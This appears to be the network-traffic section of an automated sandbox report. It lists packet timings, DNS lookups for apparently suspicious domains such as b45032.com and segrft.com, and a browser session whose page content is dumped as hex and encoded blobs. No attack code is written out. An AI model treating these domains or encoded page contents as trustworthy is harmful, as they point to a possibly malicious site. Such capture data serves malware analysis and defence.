                                                      Jan 13, 2025 00:48:28.652214050 CET49999443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.657423973 CET49996443192.168.2.4111.45.3.198
                                                      Jan 13, 2025 00:48:28.657453060 CET44349996111.45.3.198192.168.2.4
                                                      Jan 13, 2025 00:48:28.663325071 CET4435000720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.663335085 CET4435000920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.663333893 CET44350008154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:48:28.671897888 CET50010443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.682131052 CET4434999820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.682226896 CET49998443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.682264090 CET4434999820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.682331085 CET49998443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.682739019 CET4434999820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.682810068 CET49998443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.682823896 CET4434999820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.682878971 CET49998443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.682893991 CET4434999820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.682950974 CET49998443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.735938072 CET50005443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.735934973 CET50011443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.736011982 CET50006443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.740998030 CET49997443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.741050005 CET4434999720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.749970913 CET49995443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.749979973 CET4434999520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.755904913 CET50013443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.755925894 CET4435001320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.756098032 CET49998443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.756114006 CET4434999820.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.756151915 CET50013443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.758127928 CET50013443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.758143902 CET4435001320.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.758544922 CET49999443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.758574963 CET4434999920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.782542944 CET50014443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.782599926 CET4435001420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.782684088 CET50014443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.782934904 CET50014443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.782973051 CET4435001420.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.793747902 CET50016443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.793761969 CET4435001620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.793823957 CET50016443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.794200897 CET50016443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.794219971 CET4435001620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.938318968 CET4435000720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.938376904 CET4435000720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.938441992 CET50007443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.938471079 CET4435000720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.938525915 CET50007443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.938647985 CET4435000720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.938791037 CET4435000720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.938858986 CET50007443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.965215921 CET50007443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.965233088 CET4435000720.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.967158079 CET4435000620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.967189074 CET4435000620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.967264891 CET50006443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.967348099 CET4435000620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.967441082 CET4435000620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.967502117 CET50006443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.967519999 CET4435000620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.967840910 CET4435000620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.967912912 CET50006443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.967925072 CET4435000620.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.968034983 CET50006443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.981760979 CET4435000520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.981786013 CET4435000520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.981901884 CET50005443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.981928110 CET4435000520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.982146978 CET50005443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.982229948 CET4435000520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.982239962 CET4435000520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.982287884 CET50005443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:28.982378006 CET4435000520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.982387066 CET4435000520.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:28.982435942 CET50005443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.006261110 CET4435000920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.006289005 CET4435000920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.006345034 CET50009443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.006366014 CET4435000920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.006409883 CET50009443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.006417990 CET4435000920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.006464005 CET50009443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.019794941 CET4435001020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.019825935 CET4435001020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.019959927 CET50010443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.020024061 CET4435001020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.020123959 CET50010443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.020282030 CET4435001020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.020366907 CET4435001020.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.020421982 CET50010443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.036897898 CET4435001120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.036926031 CET4435001120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.037031889 CET50011443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.037060022 CET4435001120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.037261963 CET4435001120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.037319899 CET50011443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.037326097 CET4435001120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.037338972 CET4435001120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.037396908 CET50011443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.107985973 CET50009443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.108015060 CET4435000920.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.111360073 CET44350008154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:48:29.111579895 CET44350008154.86.18.4192.168.2.4
                                                      Jan 13, 2025 00:48:29.111673117 CET50008443192.168.2.4154.86.18.4
                                                      Jan 13, 2025 00:48:29.115489960 CET50011443192.168.2.420.255.122.93
                                                      Jan 13, 2025 00:48:29.115498066 CET4435001120.255.122.93192.168.2.4
                                                      Jan 13, 2025 00:48:29.116025925 CET50010443192.168.2.420.255.122.93
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 13, 2025 00:47:31.728765011 CET192.168.2.41.1.1.10xc946Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:31.728876114 CET192.168.2.41.1.1.10xe008Standard query (0)www.google.com65IN (0x0001)false
                                                      Jan 13, 2025 00:47:35.395634890 CET192.168.2.41.1.1.10xccfdStandard query (0)b45032.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:35.395813942 CET192.168.2.41.1.1.10xd98aStandard query (0)b45032.com65IN (0x0001)false
                                                      Jan 13, 2025 00:47:38.315021992 CET192.168.2.41.1.1.10xf41bStandard query (0)b45032.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:38.315176964 CET192.168.2.41.1.1.10x7e3bStandard query (0)b45032.com65IN (0x0001)false
                                                      Jan 13, 2025 00:47:40.356372118 CET192.168.2.41.1.1.10xba84Standard query (0)5getfab.segrft.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:40.356508970 CET192.168.2.41.1.1.10x3fecStandard query (0)5getfab.segrft.com65IN (0x0001)false
                                                      Jan 13, 2025 00:47:46.594727039 CET192.168.2.41.1.1.10xb06eStandard query (0)5getfab.segrft.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:46.594922066 CET192.168.2.41.1.1.10xc5f8Standard query (0)5getfab.segrft.com65IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.472861052 CET192.168.2.41.1.1.10x9672Standard query (0)hm.baidu.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.473138094 CET192.168.2.41.1.1.10x84daStandard query (0)hm.baidu.com65IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.270467043 CET192.168.2.41.1.1.10x8938Standard query (0)hm.baidu.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.270865917 CET192.168.2.41.1.1.10xcb8dStandard query (0)hm.baidu.com65IN (0x0001)false
                                                      Jan 13, 2025 00:48:40.815124989 CET192.168.2.41.1.1.10x399eStandard query (0)b45032.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:40.815380096 CET192.168.2.41.1.1.10xef32Standard query (0)b45032.com65IN (0x0001)false
                                                      Jan 13, 2025 00:48:44.554743052 CET192.168.2.41.1.1.10x47e9Standard query (0)b45032.comA (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:44.555349112 CET192.168.2.41.1.1.10xb20eStandard query (0)b45032.com65IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 13, 2025 00:47:31.735970974 CET1.1.1.1192.168.2.40xc946No error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:31.736490011 CET1.1.1.1192.168.2.40xe008No error (0)www.google.com65IN (0x0001)false
                                                      Jan 13, 2025 00:47:35.457871914 CET1.1.1.1192.168.2.40xccfdNo error (0)b45032.com154.86.18.4A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:35.457871914 CET1.1.1.1192.168.2.40xccfdNo error (0)b45032.com154.86.18.242A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:35.457871914 CET1.1.1.1192.168.2.40xccfdNo error (0)b45032.com154.86.30.135A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:38.327980042 CET1.1.1.1192.168.2.40xf41bNo error (0)b45032.com154.86.18.4A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:38.327980042 CET1.1.1.1192.168.2.40xf41bNo error (0)b45032.com154.86.30.135A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:38.327980042 CET1.1.1.1192.168.2.40xf41bNo error (0)b45032.com154.86.18.242A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:40.797478914 CET1.1.1.1192.168.2.40x3fecNo error (0)5getfab.segrft.comazcloud.tuf3a353.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:40.797478914 CET1.1.1.1192.168.2.40x3fecNo error (0)azcloud.tuf3a353.comazcloud.g.tuf3a353.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:40.872189999 CET1.1.1.1192.168.2.40xba84No error (0)5getfab.segrft.comazcloud.tuf3a353.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:40.872189999 CET1.1.1.1192.168.2.40xba84No error (0)azcloud.tuf3a353.comazcloud.g.tuf3a353.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:40.872189999 CET1.1.1.1192.168.2.40xba84No error (0)azcloud.g.tuf3a353.com20.255.122.93A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:40.872189999 CET1.1.1.1192.168.2.40xba84No error (0)azcloud.g.tuf3a353.com20.2.192.47A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:44.169862032 CET1.1.1.1192.168.2.40x7a89No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:44.169862032 CET1.1.1.1192.168.2.40x7a89No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:46.290513992 CET1.1.1.1192.168.2.40xb455No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:46.290513992 CET1.1.1.1192.168.2.40xb455No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:47.275798082 CET1.1.1.1192.168.2.40xc5f8No error (0)5getfab.segrft.comazcloud.tuf3a353.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:47.275798082 CET1.1.1.1192.168.2.40xc5f8No error (0)azcloud.tuf3a353.comazcloud.g.tuf3a353.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:47.275866032 CET1.1.1.1192.168.2.40xb06eNo error (0)5getfab.segrft.comazcloud.tuf3a353.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:47.275866032 CET1.1.1.1192.168.2.40xb06eNo error (0)azcloud.tuf3a353.comazcloud.g.tuf3a353.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:47.275866032 CET1.1.1.1192.168.2.40xb06eNo error (0)azcloud.g.tuf3a353.com20.255.122.93A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:47.275866032 CET1.1.1.1192.168.2.40xb06eNo error (0)azcloud.g.tuf3a353.com20.2.192.47A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.480041981 CET1.1.1.1192.168.2.40x9672No error (0)hm.baidu.comhm.e.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.480041981 CET1.1.1.1192.168.2.40x9672No error (0)hm.e.shifen.com111.45.3.198A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.480041981 CET1.1.1.1192.168.2.40x9672No error (0)hm.e.shifen.com14.215.183.79A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.480041981 CET1.1.1.1192.168.2.40x9672No error (0)hm.e.shifen.com183.240.98.228A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.480041981 CET1.1.1.1192.168.2.40x9672No error (0)hm.e.shifen.com111.45.11.83A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.480041981 CET1.1.1.1192.168.2.40x9672No error (0)hm.e.shifen.com14.215.182.140A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:54.480151892 CET1.1.1.1192.168.2.40x84daNo error (0)hm.baidu.comhm.e.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.417467117 CET1.1.1.1192.168.2.40xcb8dNo error (0)hm.baidu.comhm.e.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.417546034 CET1.1.1.1192.168.2.40x8938No error (0)hm.baidu.comhm.e.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.417546034 CET1.1.1.1192.168.2.40x8938No error (0)hm.e.shifen.com14.215.183.79A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.417546034 CET1.1.1.1192.168.2.40x8938No error (0)hm.e.shifen.com111.45.11.83A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.417546034 CET1.1.1.1192.168.2.40x8938No error (0)hm.e.shifen.com111.45.3.198A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.417546034 CET1.1.1.1192.168.2.40x8938No error (0)hm.e.shifen.com183.240.98.228A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:57.417546034 CET1.1.1.1192.168.2.40x8938No error (0)hm.e.shifen.com14.215.182.140A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:47:59.669929028 CET1.1.1.1192.168.2.40x7c79No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:47:59.669929028 CET1.1.1.1192.168.2.40x7c79No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:23.399581909 CET1.1.1.1192.168.2.40x13e6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:48:23.399581909 CET1.1.1.1192.168.2.40x13e6No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:40.876698971 CET1.1.1.1192.168.2.40x399eNo error (0)b45032.com154.86.18.4A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:40.876698971 CET1.1.1.1192.168.2.40x399eNo error (0)b45032.com154.86.18.242A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:40.876698971 CET1.1.1.1192.168.2.40x399eNo error (0)b45032.com154.86.30.135A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:43.068718910 CET1.1.1.1192.168.2.40x550bNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 13, 2025 00:48:43.068718910 CET1.1.1.1192.168.2.40x550bNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:44.572443962 CET1.1.1.1192.168.2.40x47e9No error (0)b45032.com154.86.18.242A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:44.572443962 CET1.1.1.1192.168.2.40x47e9No error (0)b45032.com154.86.30.135A (IP address)IN (0x0001)false
                                                      Jan 13, 2025 00:48:44.572443962 CET1.1.1.1192.168.2.40x47e9No error (0)b45032.com154.86.18.4A (IP address)IN (0x0001)false
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449740154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:36 UTC653OUTGET / HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:37 UTC1112INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Cache-Control: no-cache, private
                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IlQ5TG5DTmYzQ250YWc5Zm0xMTF6NWc9PSIsInZhbHVlIjoiMUU0dWNhMTJHV3BiXC81MTF6dGZ1TTh5UWJCMHlXbXBXUFlQUFM2dzMxVmUxc2lTODBxcmh5ajd0d0k5ZE0zbmZ5MkVLTmVEaWRXVVFvUEo4OWhRaGt3PT0iLCJtYWMiOiIwYzg3ZGU4MTY2MDI0Nzk3MDM3YzJjMzIzMTk4MGYyYzM4Yjg5N2JhOGNkYmIwOTllODIxNDdhNDRhMzk1Njg3In0%3D; expires=Mon, 13-Jan-2025 01:47:37 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                      Set-Cookie: vanguard_session=eyJpdiI6InFvbEpjb3ltYnI5UHF4Y0IwMExEMGc9PSIsInZhbHVlIjoiZ3g1SGg1eEVkb3dUaGFBY1lKUnhWQUVLMEFDd0cwVXlPWlJnaVk5c2hHWTBFY0h2cmhZb2t6dWFwb3hxRDZuV1YrME5oSzVtbnQ2bHdHVFpvbGlZXC93PT0iLCJtYWMiOiIyODY3YzY0OTQ3ZDNjNDJiYTVhNjIxZmZhMzhiYzdjYTc1ZDU0ZGRkY2QzNWJjM2I4YTdkNjE3MTI4OTRjMTQ1In0%3D; expires=Mon, 13-Jan-2025 01:47:37 GMT; Max-Age=7200; path=/; secure; httponly; samesite=none
                                                      Server: nginx
                                                      2025-01-12 23:47:37 UTC15272INData Raw: 62 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 35 67 65 74 66 61 62 2e 73 65 67 72 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 73 5f 70 6c 75 73 2f 6d 61 69 6e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 65 72 3d 31 36 30 36 37 39 30 31 30 37 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 70 6c 75 73 2f 6a 73 2f 75 6e 69 74 65 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79
                                                      Data Ascii: bb4<!DOCTYPE html><html><head><title></title><meta charset="utf-8"><link rel="shortcut icon" href="//5getfab.segrft.com/images_plus/main/favicon.ico?ver=1606790107"><script type="text/javascript" src="/plus/js/unite/crypto-js.min.js"></script><script ty
                                                      2025-01-12 23:47:37 UTC16384INData Raw: 35 2b 49 6d 2f 6c 49 58 6f 42 4f 4d 63 58 6e 50 0d 0a 66 66 38 0d 0a 4b 38 56 6b 44 35 5a 6c 4b 34 5a 6a 75 72 6d 4f 55 76 72 62 51 59 56 69 4f 37 2b 4b 50 36 68 32 36 46 39 74 62 54 45 39 73 41 44 58 6b 57 4e 4c 4a 4d 77 65 77 36 4e 6d 43 34 76 2b 64 58 39 73 39 36 75 4b 31 37 72 6e 35 59 31 47 44 43 6e 41 39 36 41 37 53 52 6d 53 4f 47 30 52 6c 45 4d 47 48 53 70 49 7a 4f 50 54 68 35 7a 7a 4e 72 31 64 45 76 67 61 45 57 69 30 49 42 7a 55 4a 38 6a 67 77 4f 35 66 79 41 53 4e 4b 38 64 47 33 66 7a 32 73 72 69 6e 39 69 46 77 6b 76 4c 71 52 58 52 56 35 31 79 58 61 61 6f 32 55 37 37 71 39 68 6f 47 70 2f 51 51 70 49 35 34 32 5a 58 68 38 61 47 5a 48 37 71 4e 55 77 6d 76 79 6b 4d 52 42 79 58 70 33 7a 4e 38 55 53 32 61 43 43 72 66 53 61 59 51 64 67 39 53 30 38 43 6b
                                                      Data Ascii: 5+Im/lIXoBOMcXnPff8K8VkD5ZlK4ZjurmOUvrbQYViO7+KP6h26F9tbTE9sADXkWNLJMwew6NmC4v+dX9s96uK17rn5Y1GDCnA96A7SRmSOG0RlEMGHSpIzOPTh5zzNr1dEvgaEWi0IBzUJ8jgwO5fyASNK8dG3fz2srin9iFwkvLqRXRV51yXaao2U77q9hoGp/QQpI542ZXh8aGZH7qNUwmvykMRByXp3zN8US2aCCrfSaYQdg9S08Ck
                                                      2025-01-12 23:47:37 UTC16384INData Raw: 31 46 6e 2b 33 34 56 34 2f 31 32 51 66 69 71 0d 0a 31 66 66 38 0d 0a 49 6f 36 4a 72 64 6e 6e 2b 53 77 4d 6a 58 57 41 64 76 6e 6c 58 78 48 76 2b 4b 66 46 59 4a 74 2b 7a 4f 46 2f 58 41 73 54 61 51 73 63 75 32 38 55 39 70 33 41 77 77 45 30 76 2f 66 61 4a 66 78 4a 41 7a 46 56 37 76 45 70 34 72 2b 54 33 74 34 6f 38 2b 64 64 51 34 50 6b 52 6e 70 75 49 36 50 71 6b 4e 71 4d 45 66 42 74 2f 2f 62 2f 4d 46 43 32 50 32 47 67 61 67 71 32 53 79 30 70 4c 4b 78 42 2b 52 67 58 35 5a 68 2b 42 39 41 50 70 4c 39 72 36 50 59 52 68 2f 4a 4e 48 75 5a 6f 6f 69 43 56 4b 48 70 63 63 46 54 73 6d 43 31 69 4b 63 50 31 63 30 39 6f 75 6a 6a 79 62 41 38 4e 65 75 6a 53 5a 75 2b 2b 36 2f 79 4b 57 48 2f 4f 55 75 5a 4c 4c 56 35 64 56 57 4e 32 41 42 68 65 6c 62 30 6e 66 58 46 57 70 4b 42 5a
                                                      Data Ascii: 1Fn+34V4/12Qfiq1ff8Io6Jrdnn+SwMjXWAdvnlXxHv+KfFYJt+zOF/XAsTaQscu28U9p3AwwE0v/faJfxJAzFV7vEp4r+T3t4o8+ddQ4PkRnpuI6PqkNqMEfBt//b/MFC2P2Ggagq2Sy0pLKxB+RgX5Zh+B9APpL9r6PYRh/JNHuZooiCVKHpccFTsmC1iKcP1c09oujjybA8NeujSZu++6/yKWH/OUuZLLV5dVWN2ABhelb0nfXFWpKBZ
                                                      2025-01-12 23:47:37 UTC16384INData Raw: 46 76 51 67 38 35 45 50 66 6b 42 58 7a 68 70 70 57 79 4a 46 72 66 36 6f 30 36 68 61 6f 31 54 72 48 2f 31 33 47 38 34 44 7a 5a 6a 73 69 46 64 49 41 30 35 75 4b 36 30 4d 52 56 57 39 69 35 55 64 67 58 6c 6f 53 66 6a 74 48 35 65 63 4a 61 36 37 57 6c 41 54 5a 75 66 55 5a 58 6f 35 74 55 52 45 39 5a 52 31 69 59 78 39 33 45 6a 4d 69 79 67 42 2b 55 73 64 66 34 4e 41 73 6b 74 6e 6d 56 46 4d 68 47 4d 65 32 38 45 79 6d 30 4e 50 52 47 58 42 30 77 77 4f 75 7a 43 67 49 66 59 44 4f 46 56 79 56 38 2f 31 56 66 46 73 6f 72 4c 6f 69 35 72 6f 64 6f 58 4f 50 6d 4c 2f 59 67 71 33 74 49 76 4b 50 63 5a 6b 30 69 32 62 44 63 49 57 51 63 6c 47 4e 45 65 45 58 39 5a 67 41 68 4d 71 59 77 79 7a 73 43 30 54 6d 52 4b 49 71 68 71 4a 37 4a 53 67 6c 54 6e 53 53 6b 33 65 51 4c 2b 53 44 61 56
